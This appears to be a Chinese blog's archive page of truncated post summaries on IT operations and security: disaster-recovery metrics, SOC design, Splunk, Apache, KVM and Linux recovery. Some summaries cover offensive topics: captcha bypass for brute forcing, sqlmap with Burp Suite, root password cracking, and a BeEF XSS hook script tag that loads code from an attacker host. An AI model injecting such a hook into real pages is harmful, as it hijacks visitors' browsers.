摘要:
RTO(RecoveryTime Object)是指灾难发生后,从IT系统崩溃导致业务停顿之刻开始,到IT系统恢复至可以支持各部门运作,业务恢复运营之时,此两点之间的时间段称为RTO。 RPO(Recovery Point Object)是指一个过去的时间点,当灾难或紧急事件发生时,数据可以恢复到的 阅读全文
摘要:
SOC即企业安全管理中心,该模型可帮助企业信息安全人员在进行安全建设方面提供整体性的参考。如下所示,以下模型分为数据采集部分收集了各类设备及日志等数据,这些数据收集到了以后提供给SOC安全管理中心,而安全管理中心的三个维度模块(防护管理、监控与应急平台、安全审计)均使用到了采集的数据。同时SOC从不 阅读全文
摘要:
一、下载安装包 可以从国内网站进入:http://10data.com/splunk/ 下载前需要注册一个splunk账号,注册后便可以提供下载,安装包名称:splunklight-6.5.1-f74036626f0c-linux-2.6-x86_64.rpm 二、安装splunk 阅读全文
摘要:
接Linux系统Apache服务 - 配置HTTP的默认主页 1、创建/srv目录,作为httpd的文件目录,并创建/srv/default/www和/srv/www1.example.com/www两个目录 2、创建/srv/default/www/index.html,内容是“default”, 阅读全文
摘要:
1、安装HTTPD和httpd-manual软件包 2、创建/var/www/html/index.html 内容是 Hello World ,暂时作为 web 服务的主页 3、启动HTTPD服务 4、开启防火墙规则,放行http 5、尝试访问创建的web服务 阅读全文
摘要:
linux服务器在不允许安装任何杀毒软件的时候,手动分析有没有中病毒可以从以下几个特征点来考虑。 特征一:查看系统里会产生多余的不明的用户cat /etc/passwd 特征二:查看开机是否启动一些不明服务 chkconfig --list | grep 3:on 特征三:查看是否有异常进程使用命令 阅读全文
摘要:
验证码的应用场景有很多,但相对较多的是用在登录页面、支付页面或敏感信息修改的地方需要输入,有的时候登录页面虽然设置了验证码机制,但是很有可能存在验证码可被绕过的情况,如此一来可能带来用户密码暴力破解或穷举应用系统的用户名信息等风险。下面分析一下验证码可能被绕过的几种情况。 (1)登录页面压根就没有验 阅读全文
摘要:
Beef xss beef安装目录:/usr/share/beef-xss UI URL: http://IP:3000/ui/panel Hook: <script src="http://IP:3000/hook.js"></script> 默认测试页面:http://IP:3000/demos 阅读全文
摘要:
安装方法: 长久使用参考: http://www.cnblogs.com/kerrycode/archive/2015/08/24/4754820.html#undefined 临时使用参考: http://www.clamav.net/documents/installing-clamav#rhe 阅读全文
摘要:
HTTPS其实是有两部分组成:HTTP + SSL / TLS, 也就是在HTTP上又加了一层处理加密信息的模块。服务端和客户端的信息传输都会通过TLS进行加密,所以传输的数据都是加密后的数据 1. 客户端发起HTTPS请求 这个没什么好说的,就是用户在浏览器里输入一个https网址,然后连接到se 阅读全文
摘要:
HTTP就是我们平时浏览网页时候使用的一种协议。HTTP协议传输的数据都是未加密的,也就是明文的,因此使用HTTP协议传输隐私信息非常不安全。为了保证这些隐私数据能加密传输,网景公司设计了SSL(Secure Sockets Layer)协议用于对HTTP协议传输的数据进行加密,从而就诞生了HTTP 阅读全文
摘要:
本站提供md5校验工具下载。Hash(md5校验工具)是一款小巧好用的哈希计算器,Hash支持文件拖放,速度很快,可以计算文件的MD5、SHA1、CRC32 的值。在论坛上、软件发布时经常用Hash md5校验工具,是为了保证文件的正确性,防止一些人盗用程序,加些木马或者篡改版权,设计的一套验证系统 阅读全文
摘要:
通常我们在使用sqlmap测试SQL注入问题的时候会先使用burpsuite来抓包,然后交给sqlmap进行扫描,此操作略显繁琐。 为了避免这种繁琐的重复操作可以将sqlmap以插件的方式集成到burpsuite里面,实现request右击send to Sqlmap了。 1. 环境准备 》 pyt 阅读全文
摘要:
截图:http://os.51cto.com/art/201509/491589.htm 阅读全文
摘要:
linux系统中的/boot目录存放着系统开机所需要的各种文件,其中包含内核、开机菜单及所需配置文件等等。但是当不小心删除了/boot目录里的某些文件或者干脆整个/boot目录都不见了的情况下,该如何恢复系统并重启系统呢,以下通过加载磁盘镜像文件以重装内核与grub2加载器的方式可解决这个问题,只是 阅读全文
摘要:
linux系统的启动过程 在介绍破解Linux系统root密码之前先了解一下linux系统的启动过程 其中,以上第10步的”Systemd查找默认目标(target),然后启动该target的所有单元“中的target指的是如下启动加载单元 破解Linux系统root用户密码 破解root密码的大致 阅读全文
摘要:
开机关机等操作 1. 使用virsh list 显示所有的虚拟机 2. 使用virsh start 开启和关闭virt1虚拟机 3. 确认磁盘的安装文件目录 备份和恢复虚拟机 4. 确保virt1虚拟机已关闭 5. 将虚拟机磁盘文件备份到tmp目录下 6. 将virsh的配置文件dump到/tmp/ 阅读全文
摘要:
KVM(基于内核的虚拟机)是标准的RHEL内核中内置的完整的虚拟化解决方案。它可以运行多款未经修改的Windows和Linux虚拟客户机操作系统。RHEL中的KVM系统管理程序通过libvirtAPI 和使用程序进行管理,如virt-manager何virsh等。以下实例中举例介绍如何利用KVM虚拟 阅读全文
摘要:
在linux系统上使用kvm安装系统时,如果你的cpu不支持虚拟化技术那么可能会报以下错误: 解决方式就是设置系统支持虚拟化技术,本例中的环境为vmware中安装了rhel7,通过rhel7中的KVM再安装rhel7系统 设置vmware中的rhel7支持虚拟化技术的操作为在系统关机状态下选中“在此 阅读全文